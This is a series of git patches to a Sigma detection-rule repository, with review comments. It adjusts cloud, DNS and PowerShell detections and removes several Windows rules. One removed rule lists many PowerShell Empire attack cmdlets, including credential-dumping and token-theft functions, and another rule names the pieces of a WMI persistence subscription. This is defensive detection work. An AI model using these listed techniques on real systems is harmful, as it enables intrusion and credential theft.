diff --git a/rules/cloud/aws/aws_elasticache_security_group_created.yml b/rules/cloud/aws/aws_elasticache_security_group_created.yml index 26c08a75..5aec929c 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_created.yml @@ -4,6 +4,7 @@ description: Detects when an ElastiCache security group has been created. author: Austin Songer status: experimental date: 2021/07/24 +modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml logsource: @@ -11,7 +12,7 @@ logsource: detection: selection: eventSource: elasticache.amazonaws.com - eventName: "Create Cache Security Group" + eventName: "CreateCacheSecurityGroup" condition: selection level: low tags: diff --git a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml index 26e32527..162b7998 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Identifies when an ElastiCache security group has been modified or author: Austin Songer status: experimental date: 2021/07/24 +modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml logsource: @@ -12,9 +13,9 @@ detection: selection: eventSource: elasticache.amazonaws.com eventName: - - "Delete Cache Security Group" - - "Authorize Cache Security Group Ingress" - - "Revoke Cache Security Group Ingress" + - "DeleteCacheSecurityGroup" + - "AuthorizeCacheSecurityGroupIngress" + - "RevokeCacheSecurityGroupIngress" - "AuthorizeCacheSecurityGroupEgress" - "RevokeCacheSecurityGroupEgress" condition: selection 
diff --git a/rules/cloud/aws/aws_s3_data_management_tampering.yml b/rules/cloud/aws/aws_s3_data_management_tampering.yml index 4787fd14..7e5229d1 100644 --- a/rules/cloud/aws/aws_s3_data_management_tampering.yml +++ b/rules/cloud/aws/aws_s3_data_management_tampering.yml @@ -1,9 +1,10 @@ -title: AWS S3 Data Management Tamperin +title: AWS S3 Data Management Tampering id: 78b3756a-7804-4ef7-8555-7b9024a02e2d description: Detects when a user tampers with S3 data management in Amazon Web Services. author: Austin Songer status: experimental date: 2021/07/24 +modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/pull/1145/files - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html @@ -16,7 +17,7 @@ logsource: service: cloudtrail detection: selection: - eventSource: iam.amazonaws.com + eventSource: s3.amazonaws.com eventName: - PutBucketLogging - PutBucketWebsite diff --git a/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml b/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml index 37814a8f..e8794cee 100644 --- a/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml +++ b/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml @@ -4,7 +4,7 @@ status: test description: Detects the modification of an EC2 snapshot's permissions to enable access from another account author: Darin Smith date: 2021/05/17 -modified: 2021/08/09 +modified: 2021/08/19 references: - https://www.justice.gov/file/1080281/download - https://attack.mitre.org/techniques/T1537/ @@ -12,7 +12,7 @@ logsource: service: cloudtrail detection: selection_source: - eventSource: cloudtrail.amazonaws.com + eventSource: ec2.amazonaws.com eventName: ModifySnapshotAttribute condition: selection_source falsepositives: From 1266a66a8d5cb6ea745e672de6a5f8965b8571ce Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 19 Aug 2021 15:37:28 +0200 Subject: [PATCH 0448/1367] add powershell_wmi_persistence.yml --- .../powershell/powershell_wmi_persistence.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/powershell/powershell_wmi_persistence.yml
diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_wmi_persistence.yml
new file mode 100644
index 00000000..c5a43e78
--- /dev/null
+++ b/rules/windows/powershell/powershell_wmi_persistence.yml
@@ -0,0 +1,34 @@
+title: Powershell WMI persistence
+id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85
+status: experimental
+author: frack113
+date: 2021/08/19
+description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md
+ - https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
+tags:
+ - attack.privilege_escalation
+ - attack.t1546.003
+logsource:
+ product: windows
+ service: powershell
+ definition: EnableScriptBlockLogging must be set to enable
+detection:
+ selection_id:
+ EventID: 4104
+ selection_ioc:
+ - ScriptBlockText|contains|all:
+ - 'New-CimInstance '
+ - '-Namespace root/subscription '
+ - '-ClassName __EventFilter
+ - '-Property ' #is a variable name
+ - ScriptBlockText|contains|all:
+ - 'New-CimInstance '
+ - '-Namespace root/subscription '
+ - '-ClassName CommandLineEventConsumer '
+ - '-Property ' #is a variable name
+ condition: all all them
+falsepositives:
+ - Unknown
+level: medium \ No newline at end of file From 89b6e1108ba3abe67396b5d1b6d2de13ee8578e2 Mon Sep 17 00:00:00 2001
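Review bot: The tags name only `attack.privilege_escalation` although the description states that the technique establishes persistence; `- attack.persistence` should sit alongside `attack.t1546.003`. Coverage is also incomplete: a working WMI subscription needs a third `New-CimInstance` creating the `__FilterToConsumerBinding`, so a third `ScriptBlockText|contains|all` entry with `'-ClassName __FilterToConsumerBinding '` would catch scripts that split the steps across separate script blocks. The trailing spaces inside the strings (`'New-CimInstance '`, `'-Namespace root/subscription '`) make the match depend on exact single-space separation, which script-block text does not guarantee; dropping them costs little precision. As committed the file is not parsable, because of the unclosed quote on `'-ClassName __EventFilter` and the `condition: all all them`; the next patch in this series corrects both.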
From: frack113 Date: Thu, 19 Aug 2021 15:42:19 +0200 Subject: [PATCH 0449/1367] powershell_wmi_persistence fix errors --- rules/windows/powershell/powershell_wmi_persistence.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_wmi_persistence.yml index c5a43e78..90559541 100644 --- a/rules/windows/powershell/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_wmi_persistence.yml @@ -21,14 +21,14 @@ detection: - ScriptBlockText|contains|all: - 'New-CimInstance ' - '-Namespace root/subscription ' - - '-ClassName __EventFilter + - '-ClassName __EventFilter ' - '-Property ' #is a variable name - ScriptBlockText|contains|all: - 'New-CimInstance ' - '-Namespace root/subscription ' - '-ClassName CommandLineEventConsumer ' - '-Property ' #is a variable name - condition: all all them + condition: all of them falsepositives: - Unknown level: medium \ No newline at end of file From cc51e054e33422f44dbbce17edee9591a3b16322 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 19 Aug 2021 09:04:22 -0500 Subject: [PATCH 0450/1367] Update azure_keyvault_secrets_modified_or_deleted.yml --- rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml index d8a15e15..f4f146af 100644 --- a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml @@ -11,6 +11,7 @@ logsource: detection: selection: properties.message: + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION From 90c9c08743271bc8bd71b0a7872d4c71c1dc17c6 Mon Sep 17 00:00:00 2001 
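Review bot: `MICROSOFT.KEYVAULT/VAULTS/SECRETS/WRITE` fires on every secret creation and routine rotation, not only on tampering, so adding it to a rule named "secrets modified or deleted" broadens it well beyond the delete, backup and purge operations it listed before. The `falsepositives` section lies outside this hunk, but it should name scheduled secret rotation and application deployments, and if the rule's level was chosen for the destructive operations alone it may need revisiting now that benign writes match.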
From: frack113 Date: Thu, 19 Aug 2021 16:09:31 +0200 Subject: [PATCH 0451/1367] fix title --- rules/windows/powershell/powershell_wmi_persistence.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_wmi_persistence.yml index 90559541..514bf453 100644 --- a/rules/windows/powershell/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_wmi_persistence.yml @@ -1,4 +1,4 @@ -title: Powershell WMI persistence +title: Powershell WMI Persistence id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 status: experimental author: frack113 From f1a84536c3bbf95ae420cad12cbe2ae98fe6a554 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 17:55:41 +0200 Subject: [PATCH 0452/1367] update fix --- rules/network/zeek/zeek_dns_mining_pools.yml | 103 +++++++++++++----- rules/network/zeek/zeek_dns_torproxy.yml | 39 ++++++- .../builtin/win_anomaly_process_execution.yml | 8 +- .../windows/builtin/win_event_log_cleared.yml | 2 +- 4 files changed, 115 insertions(+), 37 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index c6b4cde5..8adfe85d 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -2,9 +2,9 @@ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. references: - - Azure Sentinel -date: 2021/08/15 -author: Saw Winn Naung + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml +date: 2021/08/19 +author: Saw Winn Naung , Azure-Sentinel level: medium logsource: service: dns 
@@ -15,30 +15,79 @@ tags: detection: selection: query: - - 'monerohash.com' - - 'do-dear.com' - - 'xmrminerpro.com' - - 'secumine.net' - - 'xmrpool.com' - - 'minexmr.org' - - 'hashanywhere.com' - - 'xmrget.com' - - 'mininglottery.eu' - - 'minergate.com' - - 'moriaxmr.com' - - 'multipooler.com' - - 'moneropools.com' - - 'xmrpool.eu' - - 'coolmining.club' - - 'supportxmr.com' - - 'minexmr.com' - - 'coinfoundry.org' - - 'cryptoknight.cc' - - 'fairhash.org' - - 'baikalmine.com' - - 'tubepool.xyz' - - 'fairpool.xyz' - - 'asiapool.io' + - "monerohash.com" + - "do-dear.com" + - "xmrminerpro.com" + - "secumine.net" + - "xmrpool.com" + - "minexmr.org" + - "hashanywhere.com" + - "xmrget.com" + - "mininglottery.eu" + - "minergate.com" + - "moriaxmr.com" + - "multipooler.com" + - "moneropools.com" + - "xmrpool.eu" + - "coolmining.club" + - "supportxmr.com" + - "minexmr.com" + - "hashvault.pro" + - "xmrpool.net" + - "crypto-pool.fr" + - "xmr.pt" + - "miner.rocks" + - "walpool.com" + - "herominers.com" + - "gntl.co.uk" + - "semipool.com" + - "coinfoundry.org" + - "cryptoknight.cc" + - "fairhash.org" + - "baikalmine.com" + - "tubepool.xyz" + - "fairpool.xyz" + - "asiapool.io" + - "coinpoolit.webhop.me" + - "nanopool.org" + - "moneropool.com" + - "miner.center" + - "prohash.net" + - "poolto.be" + - "cryptoescrow.eu" + - "monerominers.net" + - "cryptonotepool.org" + - "extrmepool.org" + - "webcoin.me" + - "kippo.eu" + - "hashinvest.ws" + - "monero.farm" + - "supportxmr.com" + - "xmrpool.eu" + - "linux-repository-updates.com" + - "1gh.com" + - "dwarfpool.com" + - "hash-to-coins.com" + - "hashvault.pro" + - "pool-proxy.com" + - "hashfor.cash" + - "fairpool.cloud" + - "litecoinpool.org" + - "mineshaft.ml" + - "abcxyz.stream" + - "moneropool.ru" + - "cryptonotepool.org.uk" + - "extremepool.org" + - "extremehash.com" + - "hashinvest.net" + - "unipool.pro" + - "crypto-pools.org" + - "monero.net" + - "backup-pool.com" + - "mooo.com" + - "freeyy.me" + - "cryptonight.net" + - 
"shscrypto.net" condition: selection fields: - clientip diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml index b3f89c18..e073a15e 100644 --- a/rules/network/zeek/zeek_dns_torproxy.yml +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -2,9 +2,9 @@ title: DNS TOR Proxies id: a8322756-015c-42e7-afb1-436e85ed3ff5 description: Identifies IPs performing DNS lookups associated with common Tor proxies. references: - - Azure Sentinel + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_TorProxies.yaml date: 2021/08/15 -author: Saw Winn Naung +author: Saw Winn Naung , Azure-Sentinel level: medium logsource: service: dns @@ -14,9 +14,38 @@ tags: detection: selection: query: - - 'tor2web.*' - - 'onion.*' - - '*tor-gateways*' + - "tor2web.org" + - "tor2web.com" + - "torlink.co" + - "onion.to" + - "onion.ink" + - "onion.cab" + - "onion.nu" + - "onion.link" + - "onion.it" + - "onion.city" + - "onion.direct" + - "onion.top" + - "onion.casa" + - "onion.plus" + - "onion.rip" + - "onion.dog" + - "tor2web.fi" + - "tor2web.blutmagie.de" + - "onion.sh" + - "onion.lu" + - "onion.pet" + - "t2w.pw" + - "tor2web.ae.org" + - "tor2web.io" + - "tor2web.xyz" + - "onion.lt" + - "s1.tor-gateways.de" + - "s2.tor-gateways.de" + - "s3.tor-gateways.de" + - "s4.tor-gateways.de" + - "s5.tor-gateways.de" + - "hiddenservice.net" condition: selection fields: - clientip diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml index c49f18c2..163af479 100644 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ b/rules/windows/builtin/win_anomaly_process_execution.yml 
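Review bot: `query:` with plain string values is an exact match on the queried name, so a lookup for a host under one of these domains (pool endpoints are usually served from a subdomain) never equals `"supportxmr.com"` and the rule misses it; `query|endswith:` is the modifier this list needs. The same applies to the zeek_dns_torproxy.yml hunk (@@ -14,9 +14,38) in this commit, where the removed `'tor2web.*'` and `'*tor-gateways*'` wildcards at least covered subdomains. The mining-pool list also repeats `supportxmr.com`, `xmrpool.eu` and `hashvault.pro`, which a later patch in this series removes, and `mooo.com` looks like a generic dynamic-DNS apex rather than a pool domain, so it is likely to be a false-positive source worth reviewing.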
@@ -3,15 +3,15 @@ id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' author: sawwinnnaung references: - - Azure Sentinel + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/TimeSeriesAnomaly-ProcessExecutions.yaml date: 2021/08/15 level: medium -logsource: - product: windows - category: process_creation tags: - attack.execution - attack.t1064 +logsource: + product: windows + category: process_creation detection: selection: NewProcessName|contains: diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index f8c56070..e3a88f08 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -3,7 +3,7 @@ id: a122ac13-daf8-4175-83a2-72c387be339d status: experimental description: Checks for event id 1102 which indicates the security event log was cleared. references: - - Azure Sentinel + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SecurityEventLogCleared.yaml date: 2021/08/15 author: Saw Winn Naung level: medium From 3283664154cc1cccd63cd9e40cdf2cac9d0616a2 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 18:28:44 +0200 Subject: [PATCH 0453/1367] Update remove useless rules --- rules/network/zeek/zeek_dns_mining_pools.yml | 3 - .../builtin/win_anomaly_process_execution.yml | 24 -- .../builtin/win_powershelll_empire.yml | 309 ------------------ 3 files changed, 336 deletions(-) delete mode 100644 rules/windows/builtin/win_anomaly_process_execution.yml delete mode 100644 rules/windows/builtin/win_powershelll_empire.yml diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 8adfe85d..71003888 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml 
@@ -62,13 +62,10 @@ detection: - "kippo.eu" - "hashinvest.ws" - "monero.farm" - - "supportxmr.com" - - "xmrpool.eu" - "linux-repository-updates.com" - "1gh.com" - "dwarfpool.com" - "hash-to-coins.com" - - "hashvault.pro" - "pool-proxy.com" - "hashfor.cash" - "fairpool.cloud" diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml deleted file mode 100644 index 163af479..00000000 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Process Execution Anomaly -id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 -description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' -author: sawwinnnaung -references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/TimeSeriesAnomaly-ProcessExecutions.yaml -date: 2021/08/15 -level: medium -tags: - - attack.execution - - attack.t1064 -logsource: - product: windows - category: process_creation -detection: - selection: - NewProcessName|contains: - - 'powershell.exe' - - 'cmd.exe' - - 'wmic.exe' - - 'psexec.exe' - - 'cacls.exe' - - 'rundll.exe' - condition: selection diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml deleted file mode 100644 index a765f45d..00000000 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ /dev/null 
@@ -1,309 +0,0 @@ -title: Powershell Empire Cmdlets Seen In Command Line -id: ef88eb96-861c-43a0-ab16-f3835a97c928 -description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: medium -logsource: - product: windows - category: process_creation -tags: - - attack.execution - - attack.persistence - - attack.t1208 -detection: - selection1: - CommandLine|contains: ' -encodedCommand' - selection2: - CommandLine: - - 'SetDelay' - - 'GetDelay' - - 'Set-LostLimit' - - 'Get-LostLimit' - - 'Set-Killdate' - - 'Get-Killdate' - - 'Set-WorkingHours' - - 'Get-WorkingHours' - - 'Get-Sysinfo' - - 'Add-Servers' - - 'Invoke-ShellCommand' - - 'Start-AgentJob' - - 'Update-Profile' - - 'Get-FilePart' - - 'Encrypt-Bytes' - - 'Decrypt-Bytes' - - 'Encode-Packet' - - 'Decode-Packet' - - 'Send-Message' - - 'Process-Packet' - - 'Process-Tasking' - - 'Get-Task' - - 'Start-Negotiate' - - 'Invoke-DllInjection' - - 'Invoke-ReflectivePEInjection' - - 'Invoke-Shellcode' - - 'Invoke-ShellcodeMSIL' - - 'Get-ChromeDump' - - 'Get-ClipboardContents' - - 'Get-IndexedItem' - - 'Get-Keystrokes' - - 'Invoke-Inveigh' - - 'Invoke-NetRipper' - - 'local:Invoke-PatchDll' - - 'Invoke-NinjaCopy' - - 'Get-Win32Types' - - 'Get-Win32Constants' - - 'Get-Win32Functions' - - 'Sub-SignedIntAsUnsigned' - - 'Add-SignedIntAsUnsigned' - - 'Compare-Val1GreaterThanVal2AsUInt' - - 'Convert-UIntToInt' - - 'Test-MemoryRangeValid' - - 'Write-BytesToMemory' - - 'Get-DelegateType' - - 'Get-ProcAddress' - - 'Enable-SeDebugPrivilege' - - 'Invoke-CreateRemoteThread' - - 'Get-ImageNtHeaders' - - 'Get-PEBasicInfo' - - 'Get-PEDetailedInfo' - - 'Import-DllInRemoteProcess' - - 'Get-RemoteProcAddress' - - 'Copy-Sections' - - 'Update-MemoryAddresses' - - 'Import-DllImports' - - 'Get-VirtualProtectValue' - - 'Update-MemoryProtectionFlags' - - 'Update-ExeFunctions' - - 'Copy-ArrayOfMemAddresses' - - 'Get-MemoryProcAddress' - 
- 'Invoke-MemoryLoadLibrary' - - 'Invoke-MemoryFreeLibrary' - - 'Out-Minidump' - - 'Get-VaultCredential' - - 'Invoke-DCSync' - - 'Translate-Name' - - 'Get-NetDomain' - - 'Get-NetForest' - - 'Get-NetForestDomain' - - 'Get-DomainSearcher' - - 'Get-NetComputer' - - 'Get-NetGroupMember' - - 'Get-NetUser' - - 'Invoke-Mimikatz' - - 'Invoke-PowerDump' - - 'Invoke-TokenManipulation' - - 'Exploit-JMXConsole' - - 'Exploit-JBoss' - - 'Invoke-Thunderstruck' - - 'Invoke-VoiceTroll' - - 'Set-WallPaper' - - 'Invoke-PsExec' - - 'Invoke-SSHCommand' - - 'Invoke-PSInject' - - 'Invoke-RunAs' - - 'Invoke-SendMail' - - 'Invoke-Rule' - - 'Get-OSVersion' - - 'Select-EmailItem' - - 'View-Email' - - 'Get-OutlookFolder' - - 'Get-EmailItems' - - 'Invoke-MailSearch' - - 'Get-SubFolders' - - 'Get-GlobalAddressList' - - 'Invoke-SearchGAL' - - 'Get-SMTPAddress' - - 'Disable-SecuritySettings' - - 'Reset-SecuritySettings' - - 'Get-OutlookInstance' - - 'New-HoneyHash' - - 'Set-MacAttribute' - - 'Invoke-PatchDll' - - 'Get-SecurityPackages' - - 'Install-SSP' - - 'Invoke-BackdoorLNK' - - 'New-ElevatedPersistenceOption' - - 'New-UserPersistenceOption' - - 'Add-Persistence' - - 'Invoke-CallbackIEX' - - 'Add-PSFirewallRules' - - 'Invoke-EventLoop' - - 'Invoke-PortBind' - - 'Invoke-DNSLoop' - - 'Invoke-PacketKnock' - - 'Invoke-CallbackLoop' - - 'Invoke-BypassUAC' - - 'Get-DecryptedCpassword' - - 'Get-GPPInnerFields' - - 'Invoke-WScriptBypassUAC' - - 'Get-ModifiableFile' - - 'Get-ServiceUnquoted' - - 'Get-ServiceFilePermission' - - 'Get-ServicePermission' - - 'Invoke-ServiceUserAdd' - - 'Invoke-ServiceCMD' - - 'Write-UserAddServiceBinary' - - 'Write-CMDServiceBinary' - - 'Write-ServiceEXE' - - 'Write-ServiceEXECMD' - - 'Restore-ServiceEXE' - - 'Invoke-ServiceStart' - - 'Invoke-ServiceStop' - - 'Invoke-ServiceEnable' - - 'Invoke-ServiceDisable' - - 'Get-ServiceDetail' - - 'Find-DLLHijack' - - 'Find-PathHijack' - - 'Write-HijackDll' - - 'Get-RegAlwaysInstallElevated' - - 'Get-RegAutoLogon' - - 
'Get-VulnAutoRun' - - 'Get-VulnSchTask' - - 'Get-UnattendedInstallFile' - - 'Get-Webconfig' - - 'Get-ApplicationHost' - - 'Write-UserAddMSI' - - 'Invoke-AllChecks' - - 'Invoke-ThreadedFunction' - - 'Test-Login' - - 'Get-UserAgent' - - 'Test-Password' - - 'Get-ComputerDetails' - - 'Find-4648Logons' - - 'Find-4624Logons' - - 'Find-AppLockerLogs' - - 'Find-PSScriptsInPSAppLog' - - 'Find-RDPClientConnections' - - 'Get-SystemDNSServer' - - 'Invoke-Paranoia' - - 'Invoke-WinEnum{' - - 'Get-SPN' - - 'Invoke-ARPScan' - - 'Invoke-Portscan' - - 'Invoke-ReverseDNSLookup' - - 'Invoke-SMBScanner' - - 'New-InMemoryModule' - - 'Add-Win32Type' - - 'Export-PowerViewCSV' - - 'Get-MacAttribute' - - 'Copy-ClonedFile' - - 'Get-IPAddress' - - 'Convert-NameToSid' - - 'Convert-SidToName' - - 'Convert-NT4toCanonical' - - 'Get-Proxy' - - 'Get-PathAcl' - - 'Get-NameField' - - 'Convert-LDAPProperty' - - 'Get-NetDomainController' - - 'Add-NetUser' - - 'Add-NetGroupUser' - - 'Get-UserProperty' - - 'Find-UserField' - - 'Get-UserEvent' - - 'Get-ObjectAcl' - - 'Add-ObjectAcl' - - 'Invoke-ACLScanner' - - 'Get-GUIDMap' - - 'Get-ADObject' - - 'Set-ADObject' - - 'Get-ComputerProperty' - - 'Find-ComputerField' - - 'Get-NetOU' - - 'Get-NetSite' - - 'Get-NetSubnet' - - 'Get-DomainSID' - - 'Get-NetGroup' - - 'Get-NetFileServer' - - 'SplitPath' - - 'Get-DFSshare' - - 'Get-DFSshareV1' - - 'Get-DFSshareV2' - - 'Get-GptTmpl' - - 'Get-GroupsXML' - - 'Get-NetGPO' - - 'Get-NetGPOGroup' - - 'Find-GPOLocation' - - 'Get-DomainPolicy' - - 'Get-NetLocalGroup' - - 'Get-NetShare' - - 'Get-NetLoggedon' - - 'Get-NetSession' - - 'Get-NetRDPSession' - - 'Invoke-CheckLocalAdminAccess' - - 'Get-LastLoggedOn' - - 'Get-NetProcess' - - 'Find-InterestingFile' - - 'Invoke-CheckWrite' - - 'Invoke-UserHunter' - - 'Invoke-StealthUserHunter' - - 'Invoke-ProcessHunter' - - 'Invoke-EventHunter' - - 'Invoke-ShareFinder' - - 'Invoke-FileFinder' - - 'Find-LocalAdminAccess' - - 'Get-ExploitableSystem' - - 'Invoke-EnumerateLocalAdmin' - - 
'Get-NetDomainTrust' - - 'Get-NetForestTrust' - - 'Find-ForeignUser' - - 'Find-ForeignGroup' - - 'Invoke-MapDomainTrust' - - 'Get-Hex' - - 'Create-RemoteThread' - - 'Get-FoxDump' - - 'Decrypt-CipherText' - - 'Get-Screenshot' - - 'Start-HTTP-Server' - - 'Local:Invoke-CreateRemoteThread' - - 'Local:Get-Win32Functions' - - 'Local:Inject-NetRipper' - - 'GetCommandLine' - - 'ElevatePrivs' - - 'Get-RegKeyClass' - - 'Get-BootKey' - - 'Get-HBootKey' - - 'Get-UserName' - - 'Get-UserHashes' - - 'DecryptHashes' - - 'DecryptSingleHash' - - 'Get-UserKeys' - - 'DumpHashes' - - 'Enable-SeAssignPrimaryTokenPrivilege' - - 'Enable-Privilege' - - 'Set-DesktopACLs' - - 'Set-DesktopACLToAllowEveryone' - - 'Get-PrimaryToken' - - 'Get-ThreadToken' - - 'Get-TokenInformation' - - 'Get-UniqueTokens' - - 'Find-GPOComputerAdmin' - - 'Invoke-ImpersonateUser' - - 'Create-ProcessWithToken' - - 'Free-AllTokens' - - 'Enum-AllTokens' - - 'Invoke-RevertToSelf' - - 'Set-Speaker(\$Volume){\$wshShell' - - 'Local:Get-RandomString' - - 'Local:Invoke-PsExecCmd' - - 'Get-GPPPassword' - - 'Local:Inject-BypassStuff' - - 'Local:Invoke-CopyFile\(\$sSource,' - - 'ind-Fruit' - - 'New-IPv4Range' - - 'New-IPv4RangeFromCIDR' - - 'Parse-Hosts' - - 'Parse-ILHosts' - - 'Exclude-Hosts' - - 'Get-TopPort' - - 'Parse-Ports' - - 'Parse-IpPorts' - - 'Remove-Ports' - - 'Write-PortscanOut' - - 'Convert-SwitchtoBool' - - 'Get-ForeignUser' - - 'Get-ForeignGroup' - condition: selection1 or selection2 \ No newline at end of file From 23ad8cd14e9d0b71c1a1e45c0fb2f7c0538df534 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 19 Aug 2021 18:30:32 +0200 Subject: [PATCH 0454/1367] remove bad rules --- .../builtin/win_user_acc_added_removed.yml | 28 ------------------- .../builtin/win_user_acc_enabled_disabled.yml | 22 --------------- ...in_user_created_added_to_bultin_admins.yml | 23 --------------- 3 files changed, 73 deletions(-) delete mode 100644 rules/windows/builtin/win_user_acc_added_removed.yml delete mode 100644 rules/windows/builtin/win_user_acc_enabled_disabled.yml delete mode 100644 rules/windows/builtin/win_user_created_added_to_bultin_admins.yml diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml deleted file mode 100644 index 8e083b64..00000000 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ /dev/null @@ -1,28 +0,0 @@ -title: Account Added And Removed From Privileged Groups -id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 -description: Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: low -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1098 - - attack.t1078 -detection: - selection1: - EventID: - - 4728 - - 4732 - - 4756 - selection2: - EventID: - - 4729 - - 4733 - - 4757 - condition: selection1 or selection2 diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml deleted file mode 100644 index 920efc48..00000000 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ /dev/null 
@@ -1,22 +0,0 @@ -title: User Account Enabled And Disabled -id: 3d023f64-8225-41a2-9570-2bd7c2c4535e -description: Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: medium -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1098 - - attack.t1078 -detection: - selection: - EventID: - - 4722 - - 4725 - condition: selection diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml deleted file mode 100644 index 57bb606c..00000000 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: New Uer Created And Added To The Built-in Administrators Group -id: aa1eff90-29d4-49dc-a3ea-b65199f516db -description: Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed. -author: sawwinnnaung -references: - - Azure Sentinel -date: 2021/08/15 -level: low -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation -relevantTechniques: - - attack.t1098 - - attack.t1078 -detection: - selection: - EventID: - - 